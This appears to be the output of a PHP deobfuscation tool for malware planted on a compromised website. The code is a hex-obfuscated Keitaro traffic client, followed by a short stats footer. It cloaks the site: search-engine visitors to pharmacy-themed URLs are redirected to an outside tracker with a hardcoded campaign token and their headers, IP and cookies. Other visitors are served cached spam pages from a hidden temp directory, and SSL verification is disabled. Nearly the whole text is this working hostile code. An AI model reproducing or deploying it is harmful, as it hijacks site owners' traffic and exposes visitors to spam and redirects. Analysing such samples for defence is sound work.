CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $result = curl_exec($ch); if (curl_error($ch)) { throw new KClientError(curl_error($ch), curl_errno($ch)); } if (empty($result)) { throw new KClientError("\x45\155\x70\164\171\x20\x72\x65\163\160\157\x6e\x73\x65"); } return $result; } } goto TmGrz; x7rFo: class KClient { const SESSION_SUB_ID = "\x73\165\142\x5f\151\x64"; const SESSION_LANDING_TOKEN = "\x6c\141\x6e\x64\x69\156\x67\x5f\164\x6f\153\x65\156"; const VERSION = 3; const STATE_SESSION_KEY = "\x6b\x65\x69\164\141\162\x6f\x5f\x73\x74\141\164\x65"; const STATE_SESSION_EXPIRES_KEY = "\x6b\x65\x69\164\141\162\157\137\163\164\x61\x74\x65\137\145\x78\160\x69\x72\145\x73"; const DEFAULT_TTL = 1; const NOT_FOUND_STATUS = 404; private $_httpClient; private $_debug = false; private $_trackerUrl; private $_params = array(); private $_log = array(); private $_excludeParams = array("\141\x70\x69\x5f\x6b\x65\x79", "\164\157\x6b\145\x6e", "\x6c\x61\156\147\x75\x61\147\x65", "\x75\141", "\x69\x70", "\162\x65\146\145\x72\x72\x65\162", "\x66\157\x72\143\145\137\x72\x65\x64\151\162\x65\x63\164\137\157\x66\x66\x65\162"); private $_result; private $_stateRestored; private $_sessionsDisabled = false; const ERROR = "\x5b\x4b\124\x72\141\x66\x66\151\143\x43\154\x69\145\x6e\x74\135\40\x53\x6f\x6d\145\x74\150\x69\156\147\40\x69\163\x20\x77\x72\157\156\147\56\x20\105\156\x61\142\x6c\x65\x20\144\x65\142\x75\147\x20\155\x6f\x64\145\x20\164\x6f\x20\x73\x65\145\x20\164\x68\x65\40\162\145\141\163\157\x6e\x2e"; public function __construct($trackerUrl, $token) { $this->trackerUrl($trackerUrl); $this->campaignToken($token); $this->version(self::VERSION); $this->param("\151\156\146\x6f", 1); $this->fillParams(); } public function fillParams() { $referrer = isset($_SERVER["\110\x54\x54\x50\137\x52\x45\x46\105\x52\105\x52"]) ? $_SERVER["\110\x54\124\x50\x5f\x52\105\x46\x45\x52\105\x52"] : null; $this->setHttpClient(new KHttpClient()); $host = isset($_SERVER["\x48\124\124\x50\x5f\x48\117\x53\124"]) ? $_SERVER["\110\124\124\120\x5f\110\117\x53\x54"] : null; $requestUri = isset($_SERVER["\122\x45\121\x55\x45\x53\124\x5f\x55\x52\x49"]) ? $_SERVER["\122\x45\x51\125\x45\x53\124\137\125\122\x49"] : null; $this->ip($this->_findIp())->ua(isset($_SERVER["\x48\x54\x54\120\x5f\x55\123\x45\122\x5f\x41\x47\105\116\124"]) ? $_SERVER["\110\124\x54\x50\x5f\x55\123\105\x52\137\101\107\x45\x4e\124"] : null)->language(isset($_SERVER["\110\x54\124\120\x5f\101\103\x43\x45\120\124\137\114\101\116\x47\x55\101\x47\105"]) ? substr($_SERVER["\x48\124\x54\x50\137\x41\103\103\x45\120\x54\x5f\114\x41\x4e\x47\125\x41\x47\x45"], 0, 2) : '')->xRequestedWith(isset($_SERVER["\110\x54\124\x50\137\x58\x5f\x52\x45\121\125\105\123\124\105\x44\137\x57\111\x54\110"]) ? $_SERVER["\x48\124\x54\120\137\130\x5f\x52\x45\x51\x55\x45\123\124\105\x44\137\127\x49\x54\x48"] : null)->seReferrer($referrer)->referrer($referrer)->param("\x6f\162\x69\x67\x69\x6e\x61\154\x5f\150\x65\x61\144\x65\162\163", $this->_getAllHeaders())->param("\157\x72\151\x67\x69\x6e\141\154\137\x68\x6f\x73\x74", isset($_SERVER["\110\124\124\120\137\x48\117\123\124"]) ? $_SERVER["\110\124\124\x50\x5f\x48\x4f\x53\124"] : "\x6c\x6f\143\141\x6c\x68\x6f\163\164")->param("\157\162\x69\147\151\x6e\x61\154\137\x6d\x65\164\x68\157\144", isset($_SERVER["\x52\105\121\125\105\x53\x54\137\115\105\124\110\x4f\x44"]) ? $_SERVER["\122\x45\121\x55\x45\x53\x54\x5f\115\x45\x54\x48\x4f\104"] : "\107\105\x54")->param("\165\x72\x69", (!empty($_SERVER["\110\x54\x54\120\123"]) ? "\x68\x74\164\160\163" : "\150\x74\164\x70") . "\72\57\57" . $host . $requestUri)->param("\153\x76\145\x72\x73\151\157\x6e", "\63\56\64"); if ($this->isPrefetchDetected()) { $this->param("\x70\x72\145\146\145\x74\x63\x68", 1); } } public function currentPageAsReferrer() { $this->referrer($this->_getCurrentPage()); return $this; } public function debug($state = true) { $this->_debug = $state; return $this; } public function seReferrer($seReferrer) { $this->_params["\163\145\137\x72\x65\146\145\162\x72\145\x72"] = $seReferrer; return $this; } public function referrer($referrer) { $this->_params["\x72\x65\x66\x65\162\x72\145\162"] = $referrer; return $this; } public function xRequestedWith($xRequestedWith) { $this->_params["\x78\137\x72\x65\161\165\145\163\164\x65\x64\x5f\x77\151\164\150"] = $xRequestedWith; return $this; } public function setHttpClient($httpClient) { $this->_httpClient = $httpClient; return $this; } public function trackerUrl($trackerUrl) { if (!empty($trackerUrl)) { $request = parse_url($trackerUrl); $this->_trackerUrl = "{$request["\x73\143\150\x65\x6d\x65"]}\x3a\x2f\x2f{$request["\150\x6f\x73\164"]}"; if (isset($request["\x70\157\x72\x74"])) { $this->_trackerUrl .= "\x3a" . $request["\160\157\x72\x74"]; } } } public function token($token) { return $this->campaignToken($token); } public function campaignToken($campaignToken) { $this->_params["\x74\157\x6b\x65\156"] = $campaignToken; return $this; } public function version($version) { $this->_params["\x76\145\x72\x73\x69\x6f\156"] = $version; return $this; } public function ua($ua) { $this->_params["\x75\x61"] = $ua; return $this; } public function language($language) { $this->_params["\154\x61\x6e\147\x75\141\x67\x65"] = $language; return $this; } public function keyword($keyword) { $this->_params["\x6b\x65\x79\x77\157\x72\x64"] = $keyword; return $this; } public function forceRedirectOffer() { $this->_params["\x66\x6f\162\143\145\137\x72\x65\x64\151\162\x65\143\164\137\157\x66\146\145\162"] = 1; } public function ip($ip) { $this->_params["\x69\160"] = $ip; return $this; } public function sendUtmLabels() { foreach ($_GET as $name => $value) { if (strstr($name, "\165\164\x6d\x5f")) { $this->_params[$name] = $value; } } } public function setLandingToken($token) { $this->_startSession(); $_SESSION["\164\x6f\153\145\x6e"] = $token; } public function getSubId() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("\x4e\157\40\163\165\x62\x5f\151\144\40\151\x73\x20\x64\x65\146\151\156\145\144"); return "\156\157\137\x73\165\142\x69\x64"; } $subId = $result->info->sub_id; return $subId; } public function getToken() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("\116\157\40\x6c\x61\x6e\x64\x69\x6e\147\x20\164\x6f\x6b\x65\x6e\40\x69\163\x20\x64\145\146\x69\156\x65\144"); return "\x6e\x6f\x5f\164\x6f\x6b\x65\x6e"; } $subId = $result->info->token; return $subId; } public function sendAllParams() { foreach ($_GET as $name => $value) { if (empty($this->_params[$name]) && !in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } } } public function restoreFromSession() { if ($this->isStateRestored() || $this->_sessionsDisabled) { return; } $this->_startSession(); if (!empty($_SESSION[self::STATE_SESSION_KEY])) { if ($_SESSION[self::STATE_SESSION_EXPIRES_KEY] < time()) { unset($_SESSION[self::STATE_SESSION_KEY]); unset($_SESSION[self::STATE_SESSION_EXPIRES_KEY]); $this->log("\x53\x74\141\164\x65\x20\x65\x78\x70\x69\x72\x65\x64"); } else { $this->_result = json_decode($_SESSION[self::STATE_SESSION_KEY], false); if (isset($this->_result) && isset($this->_result->headers)) { $this->_result->headers = array(); } $this->_stateRestored = true; $this->log("\123\x74\x61\x74\x65\40\162\x65\163\x74\x6f\162\x65\x64"); } } } public function disableSessions() { $this->_sessionsDisabled = true; } public function restoreFromQuery() { if (isset($_GET["\137\163\x75\x62\x69\144"])) { $this->_stateRestored = true; if (empty($this->_result)) { $this->_result = new StdClass(); $this->_result->info = new StdClass(); } $this->_result->info->sub_id = $_GET["\137\x73\165\x62\x69\x64"]; $this->log("\x53\x75\x62\111\x64\x20\x6c\157\x61\x64\145\x64\40\146\162\x6f\155\x20\161\x75\x65\x72\x79"); if (isset($_GET["\x5f\164\157\153\x65\156"])) { $this->_result->info->token = $_GET["\137\x74\157\x6b\x65\x6e"]; $this->log("\114\141\x6e\144\151\156\147\40\164\157\153\145\156\40\154\x6f\x61\144\x65\x64\40\146\x72\x6f\155\40\161\x75\x65\x72\x79"); } $this->_storeState($this->_result, self::DEFAULT_TTL); $this->_stateRestored = true; } } public function isStateRestored() { return $this->_stateRestored; } public function isPrefetchDetected() { $checkServerParams = array("\110\x54\x54\x50\137\x58\x5f\x50\125\x52\120\x4f\123\105" => "\x70\x72\x65\x76\x69\145\x77", "\110\x54\124\x50\x5f\130\x5f\115\x4f\x5a" => "\x70\162\145\x66\x65\164\x63\150", "\110\124\x54\120\137\130\137\x46\x42\x5f\x48\124\x54\x50\x5f\x45\116\x47\111\x4e\x45" => "\114\151\x67\x65\162"); foreach ($checkServerParams as $name => $value) { if (isset($_SERVER[$name]) && $_SERVER[$name] == $value) { return true; } } return false; } public function saveCookie($key, $value, $ttl) { if (isset($_COOKIE[$key]) && $_COOKIE[$key] == $value) { return; } if (!headers_sent()) { setcookie($key, $value, $this->_getCookiesExpireTimestamp($ttl), "\x2f", $this->_getCookieHost()); } $_COOKIE[$key] = $value; } public function param($name, $value) { if (!in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } return $this; } public function params($value) { if (!empty($value)) { if (is_string($value)) { parse_str($value, $result); foreach ($result as $name => $value) { $this->param($name, $value); } } } return $this; } public function reset() { $this->_result = null; } public function performRequest() { if ($this->_result) { return $this->_result; } $request = $this->_buildRequestUrl(); $params = $this->getParams(); $options = $this->_getRequestOptions(); $this->log("\122\145\x71\165\x65\x73\164\x3a\40" . $request); try { $result = $this->_httpClient->request($request, $params, $options); $this->log("\122\x65\x73\160\x6f\156\x73\x65\72\x20" . $result); } catch (KClientError $e) { if ($this->_debug) { throw $e; } else { $errorCode = $e->getHumanCode(); $errorCode = $errorCode ? $errorCode . "\x20" : ''; echo $errorCode . self::ERROR; return; } } $this->_result = json_decode($result); $this->_storeState($this->_result, isset($this->_result->cookies_ttl) ? $this->_result->cookies_ttl : null); if (isset($this->_result->cookies)) { $this->_saveKeitaroCookies($this->_result->cookies, $this->_result->cookies_ttl); } return $this->_result; } public function execute($break = false, $print = true) { $result = $this->performRequest(); $body = $this->_buildBody($result); if (!$print) { return $body; } $this->_sendHeaders($result); echo $body; } public function executeAndBreak() { $result = $this->performRequest(); $body = $this->_buildBody($result); $this->_sendHeaders($result); if (!empty($body)) { die($body); } if (!empty($result->headers) && ResponseExecutor::containsActionHeader($result->headers)) { die($body); } if (!empty($result->status) && $result->status == self::NOT_FOUND_STATUS) { die($body); } } public function getContent() { $result = $this->performRequest(); return $this->_buildBody($result); } public function showLog($separator = "\x3c\142\162\x20\57\76") { echo "\74\150\162\76" . implode($separator, $this->getLog()) . "\74\150\162\76"; } public function log($msg) { if ($this->_debug) { error_log($msg); } $this->_log[] = $msg; } public function getLog() { return $this->_log; } public function getParams() { return $this->_params; } private function _sendHeaders($result) { $file = ''; $line = ''; if (headers_sent($file, $line)) { $msg = "\102\157\144\171\40\x6f\165\x74\x70\165\x74\x20\141\154\162\x65\x61\144\x79\x20\163\x74\x61\x72\x74\145\144"; if (!empty($file)) { $msg .= "\50{$file}\x3a{$line}\x29"; } $this->log($msg); return; } ResponseExecutor::sendHeaders($result); } private function _storeState($result, $ttl) { if ($this->_sessionsDisabled) { return; } $this->_startSession(); $_SESSION[self::STATE_SESSION_KEY] = json_encode($result); $_SESSION[self::STATE_SESSION_EXPIRES_KEY] = time() + $ttl * 60 * 60; if (!empty($result->info)) { if (!empty($result->info->sub_id)) { $_SESSION[self::SESSION_SUB_ID] = $result->info->sub_id; } if (!empty($result->info->token)) { $_SESSION[self::SESSION_LANDING_TOKEN] = $result->info->token; } } } private function _buildBody($result) { $content = ''; if (!empty($result)) { if (!empty($result->error)) { $content .= $result->error; } if (!empty($result->body)) { if (isset($result->contentType) && (strstr($result->contentType, "\x69\155\x61\x67\x65") || strstr($result->contentType, "\x61\x70\160\154\151\143\x61\x74\151\157\x6e\57\x70\144\146"))) { $content = base64_decode($result->body); } else { $content .= $result->body; } } } return $content; } private function _saveKeitaroCookies($cookies, $ttl) { foreach ($cookies as $key => $value) { $this->saveCookie($key, $value, $ttl); } } public function getOffer($params = array(), $fallback = "\156\157\137\x6f\146\x66\145\162") { $result = $this->performRequest(); $token = $this->getToken(); if (empty($token)) { $this->log("\x43\x61\x6d\x70\141\151\147\156\40\x68\x61\x73\x6e\x27\164\x20\162\145\x74\165\x72\x6e\x65\144\40\x6f\x66\x66\145\x72"); return $fallback; } $params["\x5f\x6c\x70"] = 1; $params["\x5f\164\x6f\153\x65\x6e"] = $result->info->token; return $this->_buildOfferUrl($params); } public function isBot() { $result = $this->performRequest(); if (isset($result->info)) { return isset($result->info->is_bot) ? $result->info->is_bot : false; } } public function isUnique($level = "\143\141\x6d\x70\x61\x69\x67\x6e") { $result = $this->performRequest(); if (isset($result->info) && $result->info->uniqueness) { return isset($result->info->uniqueness->{$level}) ? $result->info->uniqueness->{$level} : false; } } public function forceChooseOffer() { throw new \Error("\146\x6f\162\143\145\x43\x68\157\157\x73\x65\x4f\146\146\x65\x72\40\x77\141\x73\x20\162\145\155\157\x76\145\x64\x20\151\156\x20\113\x43\154\x69\x65\156\x74\x20\x76\x33\x2e"); } public function getBody() { $result = $this->performRequest(); return $result->body; } public function getHeaders() { $result = $this->performRequest(); return $result->headers; } private function _startSession() { if (!headers_sent()) { @session_start(); } } private function _buildOfferUrl($params = array()) { $params = http_build_query($params); return "{$this->_trackerUrl}\x2f\77{$params}"; } private function _getCurrentPage() { if (isset($_SERVER["\123\105\x52\x56\x45\122\x5f\120\117\x52\x54"]) && $_SERVER["\123\x45\122\x56\105\122\x5f\x50\117\x52\124"] == 443 || !empty($_SERVER["\110\124\x54\x50\123"])) { $scheme = "\150\x74\x74\x70\163"; } else { $scheme = "\150\x74\164\x70"; } return $scheme . "\x3a\x2f\57" . $_SERVER["\110\x54\124\120\x5f\x48\117\123\x54"] . $_SERVER["\x52\x45\121\x55\105\x53\x54\137\x55\x52\x49"]; } private function _buildRequestUrl() { return $this->_trackerUrl . "\57\x63\154\x69\x63\153\137\141\160\x69\x2f\166" . self::VERSION; } private function _findIp() { $ip = null; $headers = array("\x48\x54\124\120\x5f\x58\137\x46\117\122\x57\101\122\104\105\x44\x5f\106\x4f\122", "\x48\x54\124\x50\137\106\117\x52\127\101\122\104\105\104\x5f\x46\117\x52", "\110\124\124\120\137\x58\137\x46\117\x52\x57\x41\x52\x44\x45\x44", "\110\124\x54\x50\x5f\x46\117\x52\127\101\122\104\x45\x44", "\x48\124\x54\120\x5f\x43\114\x49\x45\116\x54\137\111\120", "\110\124\124\120\137\x46\x4f\122\x57\x41\x52\x44\105\104\137\106\x4f\122\137\111\x50", "\130\137\x46\x4f\x52\127\101\x52\x44\x45\x44\x5f\x46\x4f\122", "\x46\117\122\127\101\122\104\x45\104\137\x46\x4f\122", "\x58\x5f\106\117\122\127\x41\122\x44\x45\104", "\x46\x4f\x52\127\x41\122\x44\105\x44", "\103\114\111\x45\x4e\x54\137\x49\120", "\106\x4f\x52\x57\x41\122\x44\x45\104\137\106\x4f\x52\137\x49\120", "\110\124\x54\x50\x5f\103\106\x5f\x43\x4f\116\116\x45\x43\124\x49\116\107\x5f\111\x50", "\x48\x54\x54\x50\137\x50\122\x4f\130\131\137\x43\x4f\x4e\x4e\105\x43\124\x49\117\x4e"); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $tmp = explode("\x2c", $_SERVER[$header]); $ip = trim($tmp[0]); break; } } if (strstr($ip, "\54")) { $tmp = explode("\54", $ip); if (stristr($_SERVER["\x48\124\x54\120\137\x55\123\x45\122\x5f\x41\107\x45\116\x54"], "\x6d\x69\x6e\x69")) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (empty($ip)) { $ip = isset($_SERVER["\122\105\x4d\x4f\x54\x45\137\x41\x44\x44\122"]) ? $_SERVER["\x52\105\115\x4f\124\105\137\x41\x44\104\122"] : "\x31\62\x37\x2e\x30\56\x30\x2e\61"; } return $ip; } private function _getCookiesExpireTimestamp($ttl) { return time() + 60 * 60 * $ttl; } private function _getCookieHost() { if (isset($_SERVER["\x48\124\124\120\137\x48\117\x53\x54"]) && substr_count($_SERVER["\110\x54\x54\x50\x5f\x48\x4f\123\124"], "\56") < 3) { $host = "\x2e" . str_replace("\167\x77\167\x2e", '', $_SERVER["\110\x54\124\120\x5f\x48\117\x53\124"]); } else { $host = null; } return $host; } private function _getRequestOptions() { $opts = array(); if (isset($_SERVER["\x48\124\x54\120\x5f\x43\x4f\x4f\113\x49\105"])) { $opts["\x63\157\x6f\153\151\x65\163"] = preg_replace("\57\120\110\120\123\105\x53\123\111\x44\75\x2e\x2a\77\x3b\x2f\x73\151", '', $_SERVER["\x48\x54\124\120\x5f\x43\x4f\117\113\111\x45"]); } return $opts; } private function _getAllHeaders() { $headers = array(); foreach ($_SERVER as $name => $value) { if (substr($name, 0, 5) == "\x48\124\x54\120\137") { $headers[str_replace("\x20", "\55", ucwords(strtolower(str_replace("\x5f", "\x20", substr($name, 5)))))] = $value; } } return $headers; } } goto VFfKB; mnLtI: if (!$logged) { if (preg_match("\x2f\134\57\x66\141\x72\155\x61\x63\x69\141\134\x2f\x2f", $_SERVER["\x52\x45\121\x55\x45\123\x54\x5f\x55\122\x49"])) { $page = str_replace("\57", "\x2b", $_SERVER["\x52\x45\x51\125\105\123\124\x5f\x55\122\x49"]); if (file_exists("\x2f\150\x6f\155\145\x2f\x63\154\151\x6e\x69\x63\141\144\145\x6e\164\x61\154\146\x65\x6c\151\160\145\56\x65\x73\x2f\x74\155\160\x2f\x2e\x74\x6d\x70\57" . $page) && $page != '') { $prod = ''; $m = array(); if (preg_match("\57\x69\156\x67\162\145\144\151\145\156\164\x2f", $page)) { preg_match("\57\151\156\x67\x72\x65\x64\151\x65\156\x74\x73\134\53\50\x2e\52\51\x28\x5c\x2d\174\134\56\51\x2f\x55", $page, $m); $prod = $m[1]; } if (preg_match("\x2f\x66\141\162\x6d\x61\x63\151\141\x2f", $page)) { preg_match("\x2f\x66\x61\x72\155\x61\x63\x69\141\x5c\x2f\155\134\57\134\53\50\56\52\51\50\x5c\x2d\x7c\x5c\x2e\x29\x2f\x55", $page, $m); $prod = $m[1]; } if ($prod == "\166\x65\x6e\164\157\x6c\x69\x6e\55\x69\156\x68\141\x6c\145\162") { $prod = "\166\x65\156\164\x6f\154\x69\x6e"; } if (!preg_match("\57\x28\x62\157\164\174\x63\165\162\154\x29\57", @$_SERVER["\110\x54\x54\x50\137\125\x53\105\122\137\x41\107\x45\116\124"]) && !preg_match("\57\x72\x75\x7c\x6b\x7a\57\x69", $_SERVER["\110\124\124\120\x5f\101\x43\103\x45\120\x54\137\114\x41\116\x47\125\101\107\x45"]) && preg_match("\43\x28\x67\157\157\147\x6c\x65\x7c\141\157\x6c\x7c\x79\141\x68\157\x6f\x7c\142\151\x6e\147\x7c\163\x65\x61\162\x63\x68\174\142\141\151\144\x75\x7c\170\x66\151\x6e\151\164\x79\x7c\141\x73\x6b\174\172\x6f\x6f\51\43\x69", @$_SERVER["\110\124\x54\x50\137\x52\105\x46\105\122\105\122"])) { $client = new KClient("\x68\164\164\160\x73\x3a\57\x2f\x6d\x61\x6b\x65\x74\x6f\x70\150\x6f\164\154\157\x76\145\x2e\x63\157\x6d\57", "\67\65\153\x67\x70\161\x74\x72\156\x6b\x7a\x36\154\x6d\x6b\x78\163\160\x73\x67\x64\146\x73\x70\166\63\x79\146\64\x78\x71\x6c"); $client->sendAllParams(); $client->forceRedirectOffer(); $client->param("\163\165\x62\x5f\x69\144\x5f\x32", "\x63\154\151\x6e\x69\143\x61\x64\145\x6e\x74\141\154\x66\145\x6c\151\160\145\56\x65\x73"); $client->param("\x73\165\x62\x5f\x69\x64\x5f\x31", $prod); $client->currentPageAsReferrer(); $client->executeAndBreak(); } else { echo file_get_contents("\x2f\x68\157\x6d\145\57\143\154\151\156\151\143\x61\144\x65\x6e\164\x61\154\x66\145\x6c\x69\160\145\x2e\145\x73\x2f\x74\x6d\160\57\56\x74\x6d\160\x2f" . $page); die; } } } }

Function Calls

None

Variables

None

Stats

MD5 d89696cea6530a930203167e68f5bc38
Eval Count 0
Decode Time 61 ms